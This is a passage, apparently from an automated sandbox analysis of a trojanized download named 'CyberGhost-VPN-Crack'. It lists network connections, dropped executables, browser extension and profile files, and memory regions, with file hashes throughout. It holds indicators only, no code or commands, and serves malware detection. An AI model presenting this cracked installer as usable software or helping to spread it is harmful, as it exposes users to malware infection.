| GB | 142.250.178.14:443 | encrypted-tbn1.gstatic.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.187.194:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 194.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | udp |
| GB | 142.250.178.14:443 | encrypted-tbn1.gstatic.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn1.gstatic.com | udp |
Files
\??\pipe\crashpad_5264_OICCQBPEUGSZGMNG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | ac13852b616239880091e71ff4673887 |
| SHA1 | 67568192217c9cab4ee9447ec860003b62d746d1 |
| SHA256 | eccf6b7cdfbeb60e18cc19e1770606f525a1340ee2dd412adbf3b3e42be649bd |
| SHA512 | 222a617b9f98b86b2f6a7fb6fb21300b98de797f01b5a9db4b776112f3d07f9ea5c0657185c76760c3945e06f8f495933a802f9c10a758565d4e561195afffb5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c15bf8433282ba5829f0f889f5702e14 |
| SHA1 | 5c56f4cd2c3589b2abdc3b6672ab2692561226d4 |
| SHA256 | f08310b055a9d158594d50fd88692ff4b9b1f6d76ea1b3375e70d76c942c7a84 |
| SHA512 | 16aad355374e7104ac5100fd3296e705b202b20d8a02be208ffdeb72831d1a8fca6973cb9a00d10dffdcfa5dba1b1cce1da1c6de64aa96e4a17de1aace0fd6fb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 962238b5968ba6cbaa831ab05d84bd80 |
| SHA1 | 5592461127720b73f714b1211f4bf39d0893aada |
| SHA256 | b2d6c0539233633fbba2f247d9027c58d1eba1d9c3c59c3376f5869989e8a42c |
| SHA512 | 01a37dd1575c823b7af41854da68a948dae471c1df77e3baeb791d982c32bd8f7e95e4e96071a248d2fca0bf989fdfe2978f6b6376c45f7f1e81c257deb9d347 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | f95afdeb6e891c178eafa0d16e7224e8 |
| SHA1 | 3e963f6a359e0c2634a9b42861403fa01f3a7cf2 |
| SHA256 | c2d39daa7bf59b98f7a6bbe6e35b56199cd5dd2b22e5924f1e361b8186f9ada3 |
| SHA512 | 1a60c09707c2ce929881d13b9eac84eef98e71db75797a729de60b6f5b4eceb159af7d0f1212acc004fe5cc07c1c4c918090a9c5992ede90390eb8eb532698bf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 135807522394e4514edfff3e116c527d |
| SHA1 | 62008375ea162543db37144edfca1a676148bfe5 |
| SHA256 | 949c9112d3765859341fce53662c7f8283c95807d0988bb78b0ac0bc9bff6bed |
| SHA512 | 6ef0df123c5fc46a911bc38bbdff08cae9e3b67b61e11c9c186ca0976466d0b106f41eb92d58037e9840d9879e57d2d803c6a2a26aa20b7008eff35aa55c84f2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ecdc2754d7d2ae862272153aa9b9ca6e |
| SHA1 | c19bed1c6e1c998b9fa93298639ad7961339147d |
| SHA256 | a13d791473f836edcab0e93451ce7b7182efbbc54261b2b5644d319e047a00a7 |
| SHA512 | cd4fb81317d540f8b15f1495a381bb6f0f129b8923a7c06e4b5cf777d2625c30304aee6cc68aa20479e08d84e5030b43fbe93e479602400334dfdd7297f702f2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 2daa93382bba07cbc40af372d30ec576 |
| SHA1 | c5e709dc3e2e4df2ff841fbde3e30170e7428a94 |
| SHA256 | 1826d2a57b1938c148bf212a47d947ed1bfb26cfc55868931f843ee438117f30 |
| SHA512 | 65635cb59c81548a9ef8fdb0942331e7f3cd0c30ce1d4dba48aed72dbb27b06511a55d2aeaadfadbbb4b7cb4b2e2772bbabba9603b3f7d9c8b9e4a7fbf3d6b6b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 10201b42f02abebb89d50ba29230dd23 |
| SHA1 | 26d5b2c377799897951bbe1cc7a151a64187b171 |
| SHA256 | 8ca9d8836b0e8dc19bf55678a99e3706df8814cffffaa30379e5348fb85c9378 |
| SHA512 | 9399790b420a9e09b63293b115c437f8f93341ba385eac587bfa88adec1c5beeffb06ab9d5fde19eba9cf5e31137eb74ba8c3be7c1f5578ef68bd633982d8b71 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 11e04f06fd50907883db479ba6a23970 |
| SHA1 | 0bdbb8f9e9bdc9e9253ba49ff45d5be9060b26f7 |
| SHA256 | 28e606e6851e1f68d77334434ab7162b8314ae8419f973c5c7321c0868dd95dd |
| SHA512 | 8cb4de5bbffb7c205e9dbd5be2e3ef8b5f85c317a883c643053f0cf67de7190e8dc48d5bf3f0f52b54e51f3786503e570e731843dc23470dddfb56730f375270 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57e687.TMP
| MD5 | 4d4f3d2e77c0e23491b74e60c1a5a903 |
| SHA1 | 365b2041f46c403ff23f2a5666132aeccf8f07eb |
| SHA256 | 155f09594a06b66b7e737cdd50a7a989bafcf39da36860abac5f530e20b020f0 |
| SHA512 | 9022a190ab35fbd29474383609410ce0d11d415cb4997f577ce29fca49aef608ffadaf88e8191adf18a0be3d32d90a048373b1f76de9b292b115a05f3d42a514 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 430fcd48d8893e0ed8753dbb0b96c5e9 |
| SHA1 | f1920ea9440beb8ac2f2775d7b1c4527a0c93cf9 |
| SHA256 | 9845b4792f66fe2ca72f3f5b38332ee8003ca36f2846a29f4eb0d472238a7221 |
| SHA512 | f6a9285ced0169a72eb94ad46907092af769799728092d1bee024b5ad3ef44111d90aee16a4604ffc892ea1bdf0b663f6f8e7f374a3110078da5ce5b95b2b5f6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 517a2bc6514e3a66cacf4af7c8f4e4ad |
| SHA1 | 45087ce5344dadc92007ce2d41bead75b2a380e7 |
| SHA256 | b7c3dec579081170b78d471c10635e101db296f7c4ccf5570b212b475d86cebd |
| SHA512 | e610b0b35043a3e8dbfaa6e0e984af1bb04c8911dcdddfba74e77ff35c41944273ae165f6c3bef51ad7382bb620aadab1b7b63f3b2f63ff7bfb74c5c6825dcf1 |
C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs.zip
| MD5 | ea513db9c7036025ebd06ba2baf220f1 |
| SHA1 | a4e33ff3024e47067b773393a0af8aad60b9ed05 |
| SHA256 | 7c1e9054181b7b0fe8494af642eb338bcdf011b0dd6c4200b6706b2ebd169b80 |
| SHA512 | 90ba51ca0f944d8efda81ca1a99f3a5ac1bf12f6f1402d20e3082806d7ab9b3de5b43a13bd3ff23328b3db2fed1214bf4a505d7492d9e65b81ac40f550ffd5fc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1d0a2ee15c300e3de19b86cd1a280dce |
| SHA1 | 395deb5a9bcb1a96e834ad8664d9e4865f21620e |
| SHA256 | 0e1444c5ab5b2c165388ebf002b2bb9bfc9ad58dc0f129d660188437f95a5669 |
| SHA512 | 9b37e233eb2d7435063a436ec438974a55e63fb278a0a9370360f13f26a23e442d580062e4650cec7892a5bf5aa9e5e4e67d15c803a4aa8e5d09a7de9afb6773 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 75d156ee00d3933b6d78ee4bca8d30c9 |
| SHA1 | dbe63339afbf4adf831c6a8b0a006d6dfa62849b |
| SHA256 | 87a4a830be7979f02c24ce49fdd3803ea942e916598e91562f36f85561dde3fc |
| SHA512 | a88e76320f5b438d4a7ecbd7b3fc657c29fe804c24e3604d10eea7a71a7b452ae1552ad30fb645bf6dd45ea22946772f12b4de8db38c5df1e96a23b3eb66261c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | ba870e5b269fb267a9a433206b0e7bf4 |
| SHA1 | 053bf71a7c5d6d87c51da2dc7cffd9274f89dc00 |
| SHA256 | c37e76947dce495acfaed2e734d388fce34ad57e5b6a6621853e270da49b519f |
| SHA512 | 91e22f5290d3224491c0d643f96130814b3e014f48cbb43b43a7703c1a49b54629d1c1bac391baff6b701f24c57829f83a74a7da1331c1316c575377e8de5c88 |
C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs\CyberGhost-VPN-Crack_Y8CdmvPVjs.exe
| MD5 | 73ca64906737628b69fd7b18d8af2f59 |
| SHA1 | afc271719ef01c3b4ca14ff31432c4af60c405a2 |
| SHA256 | bc8e5a6c409851370c2394afe119cf5877aa740250ab7b16b37233a9fce3c974 |
| SHA512 | 2133a464fc49f0c2abe05f46130b203588359b07d308f3ddd411cfc36b38786ba434daffe27edd09d1f8ca95516ae04ae4fe4bef0bd1195773b1f023a5f05ef7 |
memory/2636-259-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-43TA7.tmp\CyberGhost-VPN-Crack_Y8CdmvPVjs.tmp
| MD5 | 24821fbb86a16c230a7073128ec09c42 |
| SHA1 | c0e36eacccae638da83ad1587ca3d4df4fa6558f |
| SHA256 | e775e1905fdc27bfc4cb08a8fecf98e745b902920350556d366f36497114aeb8 |
| SHA512 | 4836a09c0adf4929be7bb9ecfdad24d90ba2f8b650b1a2d99526d48a79aeb281709bbd47a852a8f8c20089a9a693ed42a693d0aba28c1add3a11433d63d36792 |
C:\Users\Admin\AppData\Local\Temp\is-GQPLE.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\Users\Admin\AppData\Local\Passion\passion32.exe
| MD5 | 22e901ead6a7f9ebe76b300120dd4df9 |
| SHA1 | d361dd66dcb1779f5f0683f289e439454194781d |
| SHA256 | 5e98112ed474e609f18017730a2653c40104a139a232868d497806ce797eb963 |
| SHA512 | f7acbfc9c75963a4fe4c51c147e5024064ded0cb8da2b5c73c53b6524860fb34f7da280d736caf2883b65ce42b86b5d90c460d1f0b2cbd08ce2cd74da304bc5c |
memory/2388-329-0x0000000000400000-0x0000000000C0F000-memory.dmp
memory/2388-328-0x0000000000400000-0x0000000000C0F000-memory.dmp
memory/3616-346-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2636-345-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2388-347-0x0000000000400000-0x0000000000C0F000-memory.dmp
memory/3876-351-0x0000000002FA0000-0x0000000002FD6000-memory.dmp
memory/3876-352-0x0000000005D80000-0x00000000063A8000-memory.dmp
memory/3876-353-0x0000000005910000-0x0000000005932000-memory.dmp
memory/3876-356-0x0000000005BB0000-0x0000000005C16000-memory.dmp
memory/3876-357-0x0000000005C20000-0x0000000005C86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zn0j121r.144.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3876-363-0x00000000063B0000-0x0000000006704000-memory.dmp
memory/3876-379-0x0000000006950000-0x000000000699C000-memory.dmp
memory/3876-378-0x00000000068C0000-0x00000000068DE000-memory.dmp
memory/3876-383-0x0000000006DC0000-0x0000000006DDA000-memory.dmp
memory/3876-382-0x0000000007F20000-0x000000000859A000-memory.dmp
memory/2900-398-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\OrugkdTQ\lu3msc4.exe
| MD5 | 2f75b90da0e5c994a1934cff8272704c |
| SHA1 | 910c43e915a4d3310b8015db230c0d6ace2a2344 |
| SHA256 | 021de7f424a6bbce00171c21ca4831b43e8f0fe4a5fef4ce53401a9757613ed9 |
| SHA512 | 5b5e77a4a105666be20f3510e5e03b53d4ecc4779594ae16541132b588b25a0ab15f7efa5422a5cbfceb7e3ccc6c0d0d1c2be01da0919c9daaf15d5fde9c71c6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 33fa4ff360ec9a8654e59035f5bb6cae |
| SHA1 | f1a362d8fde1d624ed76c015952650ee7114b551 |
| SHA256 | 548d5279aba67f5159ab430fb7dc00ba5fe63d5da4100c1bbf163d2486cf51f5 |
| SHA512 | b4f8b4be0c8581d5d7b3381d63fe0ba0066d6d656aecea173816643e9d7a6a5a6fb315652f48c90a34f314f442fc1d26a097b3bb355d7e11aaddfdf862330a0f |
C:\Users\Admin\AppData\Local\Temp\is-U8H3P.tmp\lu3msc4.tmp
| MD5 | da3e3293eadae0b9e8e0bb85b53bf263 |
| SHA1 | 6fd7ba9a4f76f8500f7ec3d820f70ca0c869173f |
| SHA256 | ecf5f7145a55f9014f86014fd3d9a6048b8f29e653409604e4d12cb1bda2302d |
| SHA512 | c1b4a03f7f657f1db5bbf21f68ebce7373b90135698eb5fe4c432630e7066f0c89eeddd0f6cbb0af631ad62026992503df42e31e6999b166a541044c688a0fb8 |
C:\Users\Admin\AppData\Local\Temp\is-A3HEP.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
memory/6100-420-0x0000000006730000-0x000000000677C000-memory.dmp
C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio32.exe
| MD5 | 59f1e3638a87fd86859783f6a3606cfc |
| SHA1 | 7b59ef15e86b6f0717e9c424c3c0e5f6039feb07 |
| SHA256 | ff8d9dffd4774c92136d629ba23d2ca2d721f40f6aed77ebe80591634eafeb41 |
| SHA512 | eec3dceaab04e22ce7ccd47c203067676a36bd624c176ea74cf4515c188d6e6dad5e320508d048d2d59e44bf2dbebe3b0eaeeae3d7de6165fe26ff096794fa9b |
memory/3416-460-0x0000000000400000-0x00000000006DC000-memory.dmp
memory/3416-463-0x0000000000400000-0x00000000006DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe
| MD5 | 40d3cafa0a661638b6bcdb60fdffae67 |
| SHA1 | c8d0e0b5a914cf3b35c98fe118de2ac5a6b3ddf7 |
| SHA256 | 57f1b563de0a40d250497e5705f19adbc3bef2d55803e951d68c0acd050cbdec |
| SHA512 | 892af18ac11cf21cb4bd07104089686cfbc2402819c285522a93230bb349788a31d3e1533e4690cf4387cb249fedb78b9f8a1e4e7beaccf5d69d168a31e95c43 |
memory/3592-468-0x0000000000400000-0x00000000006DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsfAAE3.tmp\blowfish.dll
| MD5 | 5afd4a9b7e69e7c6e312b2ce4040394a |
| SHA1 | fbd07adb3f02f866dc3a327a86b0f319d4a94502 |
| SHA256 | 053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae |
| SHA512 | f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511 |
C:\Users\Admin\AppData\Local\Temp\nsfAAE3.tmp\INetC.dll
| MD5 | 92ec4dd8c0ddd8c4305ae1684ab65fb0 |
| SHA1 | d850013d582a62e502942f0dd282cc0c29c4310e |
| SHA256 | 5520208a33e6409c129b4ea1270771f741d95afe5b048c2a1e6a2cc2ad829934 |
| SHA512 | 581351aef694f2489e1a0977ebca55c4d7268ca167127cefb217ed0d2098136c7eb433058469449f75be82b8e5d484c9e7b6cf0b32535063709272d7810ec651 |
C:\Users\Admin\AppData\Local\Temp\nsfAAE3.tmp\nsProcess.dll
| MD5 | faa7f034b38e729a983965c04cc70fc1 |
| SHA1 | df8bda55b498976ea47d25d8a77539b049dab55e |
| SHA256 | 579a034ff5ab9b732a318b1636c2902840f604e8e664f5b93c07a99253b3c9cf |
| SHA512 | 7868f9b437fcf829ad993ff57995f58836ad578458994361c72ae1bf1dfb74022f9f9e948b48afd3361ed3426c4f85b4bb0d595e38ee278fee5c4425c4491dbf |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ad003568e8f17b73e4c70e63189487fe |
| SHA1 | 5dbf4e47437a7343efafb821206fc5705f00efa1 |
| SHA256 | 1493213ece84f7f3ef30608e12c168eff748a37c21bccb2ed6ffd06f8dc341a2 |
| SHA512 | fd986d8b767953e0720c5f0e0cb976c1bdad5c88d0cb1a144e6ffa028a3affb6a992334f1adbd8bc73087f12a0f1af5db4ad44574ef6e4f420027de083b7efe5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e8d3beb4c99c2b284646854358aa7696 |
| SHA1 | 8b8633c11bda41807969c655eb5e50f10d58088e |
| SHA256 | e2014de688082e00f0afd0873eb5facbd85806a4526b8e51ea6293f70571dc6a |
| SHA512 | 66ec43a267504a208bd32754fd9512f8538dbf6bcf5036bb064827257195b8db1e7210040b10c50b6febcd0fe27168205e1ebe67246e5b6c2eb0a7b9ebc79c67 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 40bd0e5dd21e245892873dd1193d34be |
| SHA1 | 84e435188196c9ceac71bd85b1f0d7313d6e32a5 |
| SHA256 | 7255911a45fbc26b0e81706345022f1139b0701ab900abbaa077057e8d6a4989 |
| SHA512 | 66d59a33fba7621e0dfd5e425c929ba8ad6f2cd00aa47aba57fbd45c535547570a0b4a628840d4ecf89e0ccd37aa1597c6ca5716d7c0e8ee79063323d8192fe7 |
C:\Users\Admin\AppData\Local\Temp\nTDijDlZ\dWa7mnZkjotmkVs.exe
| MD5 | 52d971e98bcd9c7eb753f70281cf7ba2 |
| SHA1 | 877929f35d84b4730ee04a4f65f2aa29fc4b89c2 |
| SHA256 | 73020c45e2dff60cc0cc4b525d4f7109699db21235c6da2c959155049bdf06a0 |
| SHA512 | 16cb56cbdb1cd3f9fa82723bec5211ebfc2a6469be4fcaa5ce8b8db22af7f07f2b49d5d06a466b70e4c6dbb6bf4e259efa9c15e891c6f1be19fc88e953d82477 |
C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe
| MD5 | b0850e9c32b789196a6c8682e3410122 |
| SHA1 | a420cf36e183fd3dd9960acc5805b5e6f2b3b732 |
| SHA256 | a78f5891edeb5de4ed9a7f3221518a216938ea5eaaef8a50a258a65fb5aecd2f |
| SHA512 | 636f4cf68c7ff2ba773b61cf17b58d028621c982f6634ad16534e8b3f6c80dd91c93a9579405798111710e1d3fb46a584ae41ac193d592365b20a57ecc35992f |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2406102309462853612.dll
| MD5 | 2ada940614c61329829fb101f3dd100b |
| SHA1 | 4441a58c0726a26ba05dad9541413219d6ef6d84 |
| SHA256 | ad63ddb2395cc0661fdf61aee5d968c00c833fe9a0ea533a570c2f8b5dddae10 |
| SHA512 | d1987ec85374013afb76179cb222c6ffcf2888c8c201e79b3e353c17ac140a6f5200bdfdf2955fbed1f877f871dd08794dce69087cf965e8851ccd619dfbc05a |
memory/220-581-0x00000000055A0000-0x00000000058F4000-memory.dmp
memory/220-587-0x0000000006290000-0x00000000062DC000-memory.dmp
memory/2388-595-0x0000000000400000-0x0000000000C0F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | ef1f24f8c743ec916d02204a69cce18a |
| SHA1 | 01167c53bc6f75f657c0bfd2caed216df973a02b |
| SHA256 | 3dfc3340710a9065f3d2821fb7a0071378fb038dbbd4db04c1a27dd24d513e38 |
| SHA512 | 77dd9303083805e90ee28ccc657327c14affc567597184990e7b885be7385041420d77735d73c3d6bcb3af31aec676b283bdc9c44c56ad207a88d398449aa3b7 |
memory/732-622-0x0000000005B20000-0x0000000005E74000-memory.dmp
memory/732-629-0x0000000006620000-0x000000000666C000-memory.dmp
memory/732-635-0x00000000066D0000-0x00000000066F2000-memory.dmp
memory/732-634-0x0000000007170000-0x0000000007206000-memory.dmp
memory/732-636-0x0000000007B00000-0x00000000080A4000-memory.dmp
memory/5312-654-0x0000000010000000-0x0000000011E6A000-memory.dmp
memory/2388-658-0x0000000000400000-0x0000000000C0F000-memory.dmp
memory/3592-661-0x0000000000400000-0x00000000006DC000-memory.dmp
memory/3420-660-0x0000000000400000-0x00000000004BA000-memory.dmp
memory/2900-659-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\Assistant_110.0.5130.23_Setup.exe_sfx.exe
| MD5 | 028fb19ee2cea3e611b4a85ac48fafbc |
| SHA1 | d1a802b5df649282e896289b4ec5df8d512b53dd |
| SHA256 | e8fa79e22926ae07a998b5d2bb1be9309d0a15772ac72b88f4eed66052f33117 |
| SHA512 | 99959d7765c1e6636dee1841f214cb2d0c7684d7128381b0387fa9c7ef4a92ef62bb094087bdcb343e44196b5a333df3a2104ced9f49671197a06fafa27aff51 |
memory/5436-686-0x0000000005AC0000-0x0000000005E14000-memory.dmp
memory/5436-699-0x0000000006190000-0x00000000061DC000-memory.dmp
memory/3592-704-0x0000000000400000-0x00000000006DC000-memory.dmp
memory/5056-718-0x0000000004910000-0x0000000004C64000-memory.dmp
memory/2388-723-0x0000000000400000-0x0000000000C0F000-memory.dmp
memory/2928-729-0x0000000010000000-0x0000000011E6A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e0645b81f8f750a075a46c8d9ef91c19 |
| SHA1 | 5dd0a86aff0d4dd237f74fb6ccac578a5dd2a293 |
| SHA256 | 6e27f313aeb8765a218303b7e3c0e1084e77e062b17db9c8d6386e4d910dafb3 |
| SHA512 | 836847e05d705e0c2801a0790ab9494b732d297a9673e6ae40f26df0120ae1b07afdc8d3822920beba0ad9b5f119daa400253a026b4efc4e6bcf5bbcbcc4f266 |
memory/3592-912-0x0000000000400000-0x00000000006DC000-memory.dmp
memory/6380-943-0x000001DE9C600000-0x000001DE9C622000-memory.dmp
memory/2388-951-0x0000000000400000-0x0000000000C0F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 4da98f4465cff0163cd6bb676527cbf1 |
| SHA1 | dcdee735cfdc2d59afdc9600b64fb45e4442e769 |
| SHA256 | c0733ca1897b3881863e7ffbbb7666b78047d8d4a459df89a9aa51611e70b279 |
| SHA512 | e4857232f996e03283460aeacf38afbec8435a9ce22028ed68a33c90404a077b9966dcc09bc68f20b17a46237bd6bae50d2c78b9155570c53d1bcbc406ce64b4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe593eb5.TMP
| MD5 | fa96c78f40ece5a92b6a3f1b6c0eed88 |
| SHA1 | 171ab4a2ba012f921120a488ea0435e8b9b305b1 |
| SHA256 | abc74a4b73f51fc7df819418893c22d9ec9871b773368578147db366925e529d |
| SHA512 | c0f99fa5716d507591cbfbfed5dc96cf7df077176d1723e17c78d0eca1e3565896e6a5f45e262c60ba2e54685f53e15b9bc66677e9e836917955ce0836a3d3df |
C:\Users\Admin\AppData\Local\Temp\nsm4704.tmp\liteFirewall.dll
| MD5 | 165e1ef5c79475e8c33d19a870e672d4 |
| SHA1 | 965f02bfd103f094ac6b3eef3abe7fdcb8d9e2a5 |
| SHA256 | 9db9c58e44dff2d985dc078fdbb7498dcc66c4cc4eb12f68de6a98a5d665abbd |
| SHA512 | cd10eaf0928e5df048bf0488d9dbfe9442e2e106396a0967462bef440bf0b528cdf3ab06024fb6fdaf9f247e2b7f3ca0cea78afc0ce6943650ef9d6c91fee52a |
memory/3420-1051-0x0000000000400000-0x00000000004BA000-memory.dmp
memory/3592-1060-0x0000000000400000-0x00000000006DC000-memory.dmp
memory/3592-1052-0x0000000000400000-0x00000000006DC000-memory.dmp
memory/6252-1061-0x0000000000D00000-0x0000000000D52000-memory.dmp
memory/6252-1062-0x00000000055C0000-0x0000000005652000-memory.dmp
memory/6252-1063-0x0000000005660000-0x00000000056AA000-memory.dmp
memory/6252-1064-0x0000000005B10000-0x0000000005BEC000-memory.dmp
memory/6252-1078-0x0000000006440000-0x00000000064DC000-memory.dmp
memory/6252-1079-0x0000000006870000-0x0000000006900000-memory.dmp
memory/6252-1080-0x0000000006A00000-0x0000000006D54000-memory.dmp
memory/3616-1095-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2388-1096-0x0000000000400000-0x0000000000C0F000-memory.dmp
memory/3592-1114-0x0000000000400000-0x00000000006DC000-memory.dmp
memory/2252-1124-0x00000000055B0000-0x00000000055FC000-memory.dmp
memory/3616-1129-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2388-1130-0x0000000000400000-0x0000000000C0F000-memory.dmp
memory/7124-1132-0x0000000010000000-0x0000000011E6A000-memory.dmp
memory/7116-1143-0x0000000005000000-0x000000000504C000-memory.dmp
memory/7124-1152-0x0000000002810000-0x0000000002895000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi
| MD5 | 058add38d8d56fefb0398037369088b8 |
| SHA1 | 1dd4cf454c5114aed1b98a1a4b1da49a95a0aa87 |
| SHA256 | 01dbf399db22910d5f930a3ec4a09be59b68d206288ff1688628511205a16d8f |
| SHA512 | c2f4bb37147092a67c36f527879b0f81bf7589c57c2f6749ace2b6dad3f8d37324dcf63f0d8b767ed85246735c847b7a85fb0116127930de1f5ba6854c777af9 |
memory/7124-1192-0x0000000002F20000-0x0000000002F82000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\en\messages.json
